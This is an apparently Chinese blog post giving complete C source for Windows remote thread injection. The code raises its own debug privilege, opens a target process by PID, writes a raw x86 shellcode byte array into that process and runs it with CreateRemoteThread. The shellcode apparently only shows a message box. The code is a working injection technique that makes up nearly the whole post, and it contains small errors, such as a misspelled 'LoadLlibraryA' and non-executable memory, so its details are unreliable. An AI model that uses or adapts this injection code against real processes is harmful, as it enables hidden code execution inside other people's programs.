Windows线程注入——弹窗ShellCode
2015-01-16 21:15
148 查看
进行程序线程注入的代码,执行一个弹窗的ShellCode。在Win7 64位之前可以完美运行,但是Win7 64位下插入的代码因为安全机制的原因无法执行,会报错!
#include <windef.h> #include <MSCorEE.h> #include <stdio.h> typedef struct _THREAD_PARA { FARPROC pFunc[2]; }THREAD_PARAM, *PTHREAD_PARAM; BYTE SHELLCODE[] = { "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x0C\x8B\x09\x8B\x09\x8B\x69\x18\xAD\x3D\x6A\x0A\x38\x1E\x75" "\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD" "\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE" "\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24" "\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03" "\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9" "\x33\xDB\x53\x68\x74\x20\x00\x00\x68\x69\x6b\x61\x73\x68\x53\x61" "\x6e\x64\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x8B\xE6\xC3" }; void EnableDebugPriv() //由于是要注入到别的进程,所有要有一个提权操作 { HANDLE hToken; LUID sedebugnameValue; TOKEN_PRIVILEGES tkp; if ( !OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) ) return; if ( !LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue) ) { CloseHandle(hToken); return; } tkp.PrivilegeCount = 1; tkp.Privileges[0].Luid = sedebugnameValue; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if ( !AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL) ) { CloseHandle(hToken); } } BOOL InjectCode(DWORD dwPID) { HMODULE hMod = NULL; THREAD_PARAM param = {0,}; HANDLE hProcess = NULL; HANDLE hThread = NULL; LPVOID pRemoteBuf[2] = {0,}; hMod = GetModuleHandleA("Kernel32.dll"); param.pFunc[0] = GetProcAddress(hMod, "LoadLlibraryA"); param.pFunc[1] = GetProcAddress(hMod, "GetProcAddress"); hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID); pRemoteBuf[0] = VirtualAllocEx(hProcess, NULL, sizeof(THREAD_PARAM), MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(hProcess, pRemoteBuf[0], (LPVOID)¶m, sizeof(THREAD_PARAM), NULL); pRemoteBuf[1] = VirtualAllocEx(hProcess, NULL, sizeof(SHELLCODE), MEM_COMMIT, PAGE_READWRITE ); WriteProcessMemory(hProcess, pRemoteBuf[1], (LPVOID)&SHELLCODE, sizeof(SHELLCODE), NULL); hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuf[1], pRemoteBuf[0], 0, NULL); WaitForSingleObject(hThread, INFINITE); CloseHandle(hThread); CloseHandle(hProcess); return TRUE; } int main(int argv, char* args[]) { EnableDebugPriv(); DWORD PID = atoi(args[1]); if(PID!=0) { printf("Inout Pid = %d\n",PID); InjectCode(PID); } else printf("Input ERROR!"); return 0; }
相关文章推荐
- 某个牛人做WINDOWS系统文件详解
- 开启Windows 2003自动登录功能
- C#开发WINDOWS应用程序时消息的处理
- 下一版本Windows® CE 开发工具Smart Device Extensions for Microsoft Visual Studio® .NET
- windows平台下vlc编译之二:vlc-0.8.6i的编译(转自jeremiah的博客)
- How to Join a Windows Media Center PC to a Domain
- Windows下启动停止SQL Server 2005服务
- The Study of Programming Windows with MFC--Progress and Animate control
- VS2005下MFC调用Windows Media Player小结
- 消息称微软即将发布Windows 7 SP1
- 谈Windows版本—— MSDN版、OEM版、RTM版有什么不同?
- Windows多线程的同步与互斥
- VC制作 Windows服务 安装包
- 用MDT 2012为企业部署windows 7(四)--创建Deploymentshare共享以及介绍一些选项的具体作用
- Windows 8 应用开发权威指南 之 检测方向的传感器(3)确定设备方向
- windows内存堆的数据结构
- Windows环境下多线程编程原理与应用读书笔记(3)————Windows环境中的多线程实现(2)
- ubuntu windows用grub启动问题
- Windows无法安装以下功能:.NET Framework 3.5(包括 .NET 2.0 和 3.0)解决之法
- 当前标识(IIS APPPOOL\dfcreport)没有对“C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files”的写访问权限。